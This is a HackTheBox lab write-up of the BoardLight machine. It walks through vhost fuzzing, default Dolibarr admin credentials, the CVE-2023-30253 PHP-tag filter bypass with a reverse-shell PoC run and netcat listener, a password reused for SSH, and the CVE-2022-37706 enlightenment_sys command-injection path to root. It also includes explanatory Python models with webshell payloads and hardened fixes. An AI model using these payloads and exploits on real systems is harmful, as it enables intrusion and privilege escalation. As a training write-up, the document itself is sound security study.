BoardLight HTB

HTB - BoardLight Write-Up

Easy Linux Web App HackTheBox
ctf boot2root privesc web python CVE-2023-30253 CVE-2022-37706
01 /

Introduction

BoardLight is a retired machine on HackTheBox. The objective is to compromise the target and retrieve both the user and root flags.

Name BoardLight
Difficulty Easy
OS Linux
Type Web App

Let's dive into the challenge!

02 /

Reconnaissance

I started by adding the machine IP address to my /etc/hosts file:

dawnl3ss@parrot-sec - /etc/hosts
┌─[dawnl3ss@parrot]─[~/Neptune/Security/CTF/HTB/BoardLight]
└──╼ [★]$ sudo vim /etc/hosts

I then ran an Nmap scan of all 65535 TCP ports (-p-) with default scripts and version detection (-sC -sV) to enumerate the exposed services:

nmap scan
┌─[dawnl3ss@parrot]─[~/Neptune/Security/CTF/HTB/BoardLight]
└──╼ [★]$ sudo nmap -sC -sV -p- boardlight.htb > nmap_scan.txt

┌─[dawnl3ss@parrot]─[~/Neptune/Security/CTF/HTB/BoardLight]
└──╼ [★]$ cat nmap_scan.txt
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-06-10 11:43 CEST
Nmap scan report for boardlight.htb (10.10.11.11)
Host is up (0.015s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.11
| ssh-hostkey:
|   3072 06:2d:3b:85:10:59:ff:73:66:27:7f:0e:ae:03:ea:f4 (RSA)
|   256 59:03:dc:52:87:3a:35:99:34:44:74:33:78:31:35:fb (ECDSA)
|_  256 ab:13:38:e4:3e:e0:24:b4:69:38:a9:63:82:38:dd:f4 (ED25519)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-title: Site doesn't have a title
|_http-server-header: Apache/2.4.41 (Ubuntu)

Nmap done: 1 IP address (1 host up) scanned in 28.65 seconds

Only SSH and HTTP are exposed, so the web server on port 80 is the attack surface. A directory brute-force of the main site with FFUF turned up nothing of interest, so the next step was to look for name-based virtual hosts by fuzzing the Host header against the same IP.

Main website
// boardlight.htb - main page
wfuzz - vhost enumeration
┌─[dawnl3ss@parrot]─[~/Neptune/Security/CTF/HTB/BoardLight]
└──╼ [★]$ wfuzz -c -w /security/tools/Kharon/ressources/wordlists/dir-enum-int-3.txt \
       -u "http://board.htb/" -H "Host: FUZZ.board.htb" --hl 517

Target: http://board.htb/
Total requests: 220546

ID           Response   Lines    Word       Chars       Payload
=====================================================================
000002041:   200        149 L    504 W      6360 Ch     "crm"
000006068:   200        149 L    504 W      6360 Ch     "CRM"

The --hl 517 filter hides the 517-line page that Apache returns for any Host name it does not know, which is what makes the two real responses stand out. Both hits return the same 149-line page (crm and CRM, since Host matching is case-insensitive), so there is one hidden virtual host: crm.board.htb. Let's investigate!
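The same baseline-and-compare technique as the wfuzz run, written out as an added example (not code from the original write-up or from wfuzz). It brings up a constructed stand-in for the target on 127.0.0.1 that answers differently depending on the Host header, takes the baseline from a Host name that cannot exist, and reports candidates whose (status, length, line count) fingerprint differs, which is the automated form of --hl 517. The vhost names, page bodies and wordlist are all constructed for the demo.

```python
"""Name-based virtual-host discovery by Host-header fuzzing.

Every request goes to one IP address; only the Host header changes. A name
that cannot exist gives the baseline ("what the server returns for an unknown
Host"); candidates whose response differs from that baseline are real vhosts.
"""
import http.client
import threading
import uuid
from http.server import BaseHTTPRequestHandler, HTTPServer

# Constructed stand-in for the target: one IP, two name-based vhosts. Apache
# falls back to its first configured vhost for unknown Host values, which is
# what FALLBACK models here.
VHOSTS = {
    "board.htb": b"<html>\n" + b"<p>main site</p>\n" * 40 + b"</html>\n",
    "crm.board.htb": b"<html>\n" + b"<form>login</form>\n" * 20 + b"</html>\n",
}
FALLBACK = VHOSTS["board.htb"]


class _TargetHandler(BaseHTTPRequestHandler):
    def do_GET(self):
        name = self.headers.get("Host", "").split(":")[0]
        body = VHOSTS.get(name, FALLBACK)
        self.send_response(200)
        self.send_header("Content-Type", "text/html")
        self.send_header("Content-Length", str(len(body)))
        self.end_headers()
        self.wfile.write(body)

    def log_message(self, *_):  # silence per-request logging
        pass


def start_fake_target():
    """Start the constructed target on 127.0.0.1 and an ephemeral port."""
    server = HTTPServer(("127.0.0.1", 0), _TargetHandler)
    threading.Thread(target=server.serve_forever, daemon=True).start()
    return server


def fingerprint(ip, port, vhost):
    """(status, byte length, line count) of GET / sent with the given Host."""
    conn = http.client.HTTPConnection(ip, port, timeout=5)
    try:
        conn.request("GET", "/", headers={"Host": vhost})
        resp = conn.getresponse()
        body = resp.read()
    finally:
        conn.close()
    return resp.status, len(body), body.count(b"\n")


def enumerate_vhosts(ip, port, domain, words):
    """Return [(label, fingerprint)] for candidates that differ from the baseline."""
    baseline = fingerprint(ip, port, f"{uuid.uuid4().hex}.{domain}")
    hits = []
    for word in words:
        fp = fingerprint(ip, port, f"{word}.{domain}")
        if fp != baseline:
            hits.append((word, fp))
    return hits


if __name__ == "__main__":
    target = start_fake_target()
    port = target.server_address[1]
    wordlist = ["www", "dev", "crm", "mail", "staging"]  # constructed wordlist
    for label, fp in enumerate_vhosts("127.0.0.1", port, "board.htb", wordlist):
        print(f"{label}.board.htb -> status {fp[0]}, {fp[1]} bytes, {fp[2]} lines")
    target.shutdown()
```

Comparing a fingerprint rather than a single number avoids the trap of a vhost whose page happens to have the same line count as the fallback; on a real target you would also re-take the baseline a few times, since dynamic pages can vary between requests.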

03 /

Getting a Shell

I added the subdomain to /etc/hosts and navigated to it:

Dolibarr login
// crm.board.htb - Dolibarr 17.0 login page

We're greeted by a Dolibarr CRM login page. Let's test the default credentials first.

Default Dolibarr credentials: admin:admin

Dolibarr dashboard
// Dolibarr - authenticated dashboard

The default credentials worked, giving admin access to Dolibarr 17.0. An unchanged default admin password on the CRM is a finding on its own; the version is what turns it into code execution.

Dolibarr 17.0.0 is affected by CVE-2023-30253, an authenticated remote code execution fixed in 17.0.1. The Website module lets an admin create sites and pages, and it refuses page content containing PHP, but the 17.0.0 check matched the open tag case-sensitively: <?PHP passes the filter, and PHP, which accepts the tag in any case, executes it when the page is served. That is exactly what the public PoC automates: log in, create a site, create a page, edit it with a reverse-shell payload, and trigger it.

CVE-2023-30253 - Dolibarr 17.0.0 Remote Code Execution

Reference: github.com/nikn0laty/Exploit-for-Dolibarr-17.0.0-CVE-2023-30253
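A model of the filter bug behind the CVE, added here as an example; it is not Dolibarr's PHP and not the PoC's code. The vulnerable check reproduces the case-sensitive substring test in Python, the hardened check uses the rule the PHP engine itself applies, and the payloads are constructed for the demo. Whether 17.0.0 also missed the <?= echo tag is not something this write-up establishes; the model treats it as a tag any filter has to cover because PHP always honours it.

```python
"""Model of the CVE-2023-30253 root cause in Dolibarr's Website module.

Page content is rejected when it contains a PHP open tag, but the pre-17.0.1
check matched "<?php" case-sensitively. PHP treats the open tag
case-insensitively, so "<?PHP ... ?>" passed the filter and ran when the page
was served. Python model of the check, not Dolibarr's code.
"""
import re

# What the PHP engine accepts as an open tag. The bare short tag "<?" is left
# out because it depends on short_open_tag; "<?php" and "<?=" are always on.
PHP_OPEN_TAG = re.compile(r"<\?(?:php(?=\s)|=)", re.IGNORECASE)


def php_would_execute(content: str) -> bool:
    """Does the PHP engine see an open tag in this content?"""
    return PHP_OPEN_TAG.search(content) is not None


def vulnerable_has_php(content: str) -> bool:
    """Modelled 17.0.0 behaviour: literal, case-sensitive substring test."""
    return "<?php" in content


def hardened_has_php(content: str) -> bool:
    """The filter has to apply the engine's own rule, not a stricter-looking
    literal that the engine does not share."""
    return php_would_execute(content)


def filter_outcome(content: str, check) -> str:
    """'blocked' by the filter, 'bypassed' (stored and later executed),
    or 'harmless' (no PHP at all)."""
    if check(content):
        return "blocked"
    return "bypassed" if php_would_execute(content) else "harmless"


# Constructed payloads for the demo, not the ones the referenced PoC sends.
PAYLOADS = {
    "lowercase": "<?php system($_GET['c']); ?>",
    "uppercase": "<?PHP system($_GET['c']); ?>",
    "mixed": "<?Php echo shell_exec($_GET['c']); ?>",
    "short-echo": "<?= shell_exec($_GET['c']) ?>",
    "plain-html": "<p>Welcome to the CRM</p>",
}


def audit(check) -> dict:
    """Outcome of every payload under the given filter."""
    return {name: filter_outcome(p, check) for name, p in PAYLOADS.items()}


if __name__ == "__main__":
    print("vulnerable:", audit(vulnerable_has_php))
    print("hardened:  ", audit(hardened_has_php))
```

The general lesson is the mismatch: the filter and the interpreter disagree on what counts as PHP, and the attacker only needs one input the interpreter accepts that the filter does not. Running it as a script prints the two audits; the vulnerable filter blocks only the lowercase payload.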

exploit CVE-2023-30253
┌─[dawnl3ss@parrot]─[.../Exploit-for-Dolibarr-17.0.0-CVE-2023-30253]
└──╼ [★]$ python3 exploit.py http://crm.board.htb admin admin 10.10.14.2 4444
[*] Trying authentication...
[**] Login: admin
[**] Password: admin
[*] Trying created site...
[*] Trying created page...
[*] Trying editing page and call reverse shell... Press Ctrl+C after successful connection

# In a second terminal - netcat listener:
┌─[dawnl3ss@parrot]─[~/Neptune/Security/CTF/HTB/BoardLight]
└──╼ [★]$ nc -lnvp 4444
listening on [any] 4444 ...
connect to [10.10.14.2] from (UNKNOWN) [10.10.11.11] 58592
www-data@boardlight:~/html/crm.board.htb/htdocs/public/website$

Initial access obtained as www-data. Let's escalate.

04 /

Privilege Escalation

Enumerating from the www-data shell, I found the database credentials in Dolibarr's configuration file, conf/conf.php under the install's htdocs directory, which the web server user can read:

conf.php - leaked credentials
$dolibarr_main_db_user='dolibarrowner';
$dolibarr_main_db_pass='serverfun2$2023!!';

Database passwords are frequently reused for OS accounts, so the next check is to try this one against the local users over SSH. It worked for larissa:

SSH - lateral movement to larissa
┌─[dawnl3ss@parrot]─[~/Neptune/Security/CTF/HTB/BoardLight]
└──╼ [★]$ ssh larissa@board.htb
larissa@board.htb's password:
Last login: Mon Jun 10 04:06:55 2024 from 10.10.14.2
larissa@boardlight:~$

larissa@boardlight:~$ cat user.txt
...REDACTED...

User flag captured! Now let's escalate to root.

Running LinPEAS listed the setuid-root binaries on the system. Among them was enlightenment_sys, the privileged helper the Enlightenment window manager uses to mount and unmount devices for desktop users, and Enlightenment versions before 0.25.4 carry a known local privilege escalation in it: the helper accepts a mount source as long as the string begins with /dev/, then hands the command to a shell, so a source such as /dev/../tmp/;<script> survives the check and everything after the semicolon runs as root.

CVE-2022-37706 - Enlightenment LPE (Local Privilege Escalation)

Reference: github.com/MaherAzzouzi/CVE-2022-37706-LPE-exploit
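A model of the path check behind the CVE, added as an example; it is not the helper's C code and not the referenced exploit script. The vulnerable builder reproduces the shape of the bug (prefix test on the raw string, result executed through a shell), the hardened builder normalises first and produces an argv for execve() so a semicolon is just a byte, and the mount point and option validation that the real helper also performs are left out. The source path, mount point and exploit path are constructed for the demo.

```python
"""Model of the CVE-2022-37706 root cause in enlightenment_sys.

The setuid-root helper restricts the mount source to device nodes by testing
whether the argument *starts with* "/dev/", then passes the command line to a
shell. "/dev/../tmp/;/tmp/exploit" passes the prefix test, mount fails on
"/dev/../tmp/" (the fstab error seen in the exploit output) and the shell then
runs "/tmp/exploit" as root. Python model of the check, not the helper's code.
"""
import os

MOUNT = "/bin/mount"
OPTS = "nosuid,nodev,noexec"


def vulnerable_mount_cmd(source: str, target: str) -> str:
    """Pre-0.25.4 shape: prefix test on the raw string, shell command line out."""
    if not source.startswith("/dev/"):
        raise PermissionError("mount source must be under /dev/")
    return f"{MOUNT} -o {OPTS} {source} {target}"  # would be passed to system()


def hardened_mount_argv(source: str, target: str) -> list:
    """Normalise, check the normalised path, and never build a shell string."""
    real = os.path.realpath(source)  # "/dev/../tmp/;x" -> "/tmp/;x"
    if os.path.dirname(real) != "/dev":
        raise PermissionError("mount source must be a node directly under /dev/")
    return [MOUNT, "-o", OPTS, real, target]  # argv for execve(): no shell parsing


def shell_split(command_line: str) -> list:
    """Simplified /bin/sh -c view: ';' separates independent commands.
    (A real shell also splits on newlines, '&&', '||' and '|'.)"""
    return [part.strip() for part in command_line.split(";") if part.strip()]


def accepted(builder, source: str, target: str) -> bool:
    """Did the given builder let this source through its check?"""
    try:
        builder(source, target)
        return True
    except PermissionError:
        return False


if __name__ == "__main__":
    evil = "/dev/../tmp/;/tmp/exploit"  # constructed payload shape
    for cmd in shell_split(vulnerable_mount_cmd(evil, "/tmp/net")):
        print("root would run:", cmd)
    print("hardened accepts /dev/sdb1:", accepted(hardened_mount_argv, "/dev/sdb1", "/mnt/usb"))
    print("hardened accepts payload:  ", accepted(hardened_mount_argv, evil, "/tmp/net"))
```

Two things have to change together: canonicalise before checking (a prefix test on an unnormalised path proves nothing about where it points), and stop interpreting attacker-controlled bytes with a shell at all. Fixing only the first still leaves option-injection and quoting problems; fixing only the second still allows mounting anything reachable through /dev/.. as a device.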

I copied the exploit script to /tmp on the target, made it executable and ran it. The mount error in the output is expected: it is the legitimate mount call failing on the bogus /dev/../tmp/ source just before the injected command runs as root.

CVE-2022-37706 - root shell
larissa@boardlight:/tmp$ ./exploit.sh
CVE-2022-37706
[*] Trying to find the vulnerable SUID file...
[*] This may take few seconds...
[+] Vulnerable SUID binary found!
[+] Trying to pop a root shell!
[+] Enjoy the root shell :)
mount: /dev/../tmp/: can't find in /etc/fstab.
# id
uid=0(root) gid=0(root) groups=0(root),4(adm),1000(larissa)

# cat /root/root.txt
1605468aaeea6710492ec1ecf77e892b

Root flag captured! Box fully pwned. GG 💀